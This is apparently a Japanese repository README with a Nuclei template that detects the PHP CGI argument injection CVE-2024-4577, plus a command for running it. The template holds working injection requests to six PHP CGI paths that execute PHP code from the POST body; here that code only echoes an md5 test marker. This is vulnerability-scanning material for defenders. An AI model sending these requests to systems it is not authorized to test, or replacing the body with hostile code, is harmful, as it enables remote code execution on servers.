
CVE-2024-4577 PHP CGI引数インジェクション脆弱性を検出するためのNucleiテンプレート。細工されたHTTPリクエストとレスポンスマッチングにより、自動化されたRCEテストを可能にします。
このリポジトリには、CVE-2024-4577として特定されたPHP CGI引数インジェクション脆弱性を検出するためのNucleiテンプレートが含まれています。
id: CVE-2024-4577
info:
name: CVE-2024-4577 PHP CGI Argument Injection
author: Hüseyin TINTAŞ
severity: critical
description: >
CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
tags: cve,cve2024,php,cgi,rce,cve2024-4577
http:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
headers:
User-Agent: "curl/8.3.0"
Accept: "*/*"
Content-Type: "application/x-www-form-urlencoded"
Connection: "keep-alive"
body: |
<?php echo md5("CVE_2024_4577_TEST"); ?>
matchers:
- type: word
part: body
words:
- "83946a388fdf6cd2707eed8550575a76"
このテンプレートをNucleiで使用するには、テンプレートの内容を CVE-2024-4577.yaml というファイルに保存し、以下のコマンドを実行します:
nuclei -t CVE-2024-4577.yaml -u <target-url>
<target-url> はスキャン対象のURLに置き換えてください。
ご質問や詳細情報については、以下の連絡先までお問い合わせください: